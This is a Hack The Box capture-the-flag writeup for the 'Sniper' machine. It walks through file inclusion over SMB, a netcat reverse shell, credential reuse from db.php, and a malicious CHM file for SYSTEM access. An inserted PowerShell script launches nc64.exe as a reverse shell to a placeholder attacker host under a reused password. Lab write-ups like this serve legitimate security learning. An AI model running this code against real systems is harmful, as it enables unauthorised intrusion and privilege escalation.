Sniper - HTB Writeup
Sniper
Information Gathering
Nmap Port Scan
Nmap Script Scan
Nmap Full Port Scan
Nmap Vulnerability Scan
Service Enumeration
Nikto Web Scan on Port 80
FFuF Web Enumeration on Port 80
Nmap SMB Scan
HTTP Service Enumeration
Gobuster Web Enumeration
/blog Web Endpoint
User Account Registration
Penetration
Local File Inclusion - Lang Parameter
The lang parameter on the /blog/ endpoint is vulnerable to local file inclusion. A curl request that includes win.ini through this parameter confirms the basic local file inclusion on the target server: win.ini exists on every Windows install and has fixed section headers, so it is a safe read-only canary that proves the include works before anything more invasive is tried.
Remote File Inclusion over SMB
With local file inclusion confirmed, the next test is a UNC path: a lang value starting with \\ followed by our attacking machine's IP. Standing up a basic SMB server with the Impacket smbserver lets us confirm that the back end really reaches out to us, because the incoming connection shows up in the server's output. The Impacket server did not appear to serve the include reliably, but setting up a proper Samba share on the attacking Kali machine let us use the RFI against a full SMB server and pull a PHP payload from it. Turning that into a reverse shell is documented in the next section.
iusr User Shell Enumeration
Once remote code execution is achieved, a reverse shell is easily spawned by copying nc64.exe onto the box and then executing the reverse shell command through the same RFI.
Privilege Escalation
SQL Credentials in db.php
Chris User Shell
The Chris user is the only other interactive user on the target machine. The MySQL credentials recovered from db.php are reused for this account, so we can wrap them in a PowerShell credential object and launch our reverse shell as Chris.
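The credential pivot described above, as an added example that is not part of the original writeup. It is typed into the iusr reverse shell. Assumptions: the password from db.php is valid for the local Chris account, nc64.exe is still at C:\Windows\Temp from the previous step, a second listener is waiting on the attacker, and WinRM on the box accepts Chris on the loopback listener (the Start-Process fallback is included for the case where it does not).

```powershell
# Added example (not from the original writeup): run from the iusr shell.
# All addresses, ports and paths are placeholders.
$Attacker = 'ATTACKER_IP'   # placeholder
$Port     = 4445            # placeholder: second listener, nc -lvnp 4445

# Build a credential for the local Chris account from the db.php password.
# Pass the password in rather than hard-coding it in a script left on the box.
function New-ChrisCredential {
    param([Parameter(Mandatory)][string]$Password)
    $secure = ConvertTo-SecureString -String $Password -AsPlainText -Force
    return New-Object System.Management.Automation.PSCredential("$env:COMPUTERNAME\Chris", $secure)
}

# Confirm the password works before doing anything noisier. Assumes WinRM is
# enabled and allows Chris; a wrong password, or an account that is not
# permitted over WinRM, makes Invoke-Command throw and this returns $null.
function Test-ChrisCredential {
    param([Parameter(Mandatory)][pscredential]$Credential)
    try {
        return Invoke-Command -ComputerName localhost -Credential $Credential -ScriptBlock { whoami }
    } catch {
        return $null
    }
}

# Preferred path: a WinRM session runs nc64.exe cleanly under Chris's token.
# $Attacker/$Port are not visible inside the remote script block, hence -ArgumentList.
function Start-ChrisReverseShell {
    param([Parameter(Mandatory)][pscredential]$Credential)
    Invoke-Command -ComputerName localhost -Credential $Credential -ScriptBlock {
        param($ip, $port)
        & C:\Windows\Temp\nc64.exe $ip $port -e powershell.exe
    } -ArgumentList $Attacker, $Port
}

# Fallback if WinRM refuses the account: Start-Process -Credential (CreateProcessWithLogon).
# Caveat: this can fail from a non-interactive context such as the IIS worker
# session, which is why the WinRM route is tried first.
function Start-ChrisReverseShellLocal {
    param([Parameter(Mandatory)][pscredential]$Credential)
    Start-Process -FilePath 'C:\Windows\Temp\nc64.exe' `
        -ArgumentList @($Attacker, "$Port", '-e', 'powershell.exe') `
        -Credential $Credential -WorkingDirectory 'C:\Windows\Temp'
}

# Usage:
#   $cred = New-ChrisCredential -Password 'PASSWORD_FROM_DB_PHP'
#   Test-ChrisCredential -Credential $cred      # expect <hostname>\chris
#   Start-ChrisReverseShell -Credential $cred   # then check the 4445 listener
```

The `Test-ChrisCredential` step is the one worth keeping even when you are in a hurry: a credential failure and a WinRM policy failure look identical from inside a blind reverse shell, and the function separates "password wrong" from "password right, transport refused" before you spend time on the fallback.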
Chris User Shell Enumeration
A note in C:\Docs discusses documentation for a new PHP project and says that files placed in this folder will be read. After copying a CHM file into this folder we can see that it is opened and then deleted, so something is consuming whatever lands there.
Crafting Malicious CHM File
Because any CHM file dropped here is opened and deleted, we can craft a malicious CHM that runs a command when it is opened by the end user. Nishang's Out-CHM.ps1 exists to do exactly that. The steps for successful exploitation follow; a second Windows VM was used to compile the file, since Out-CHM relies on the HTML Help Workshop compiler (hhc.exe) being installed locally.
https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
Administrator User Shell
By mounting the attacking machine's SMB share with net use, we can reach files on the attacking server directly from the Chris shell. Copying the malicious CHM from that share into C:\Docs and waiting returns a shell as the NT AUTHORITY\SYSTEM user, giving full control over the target system.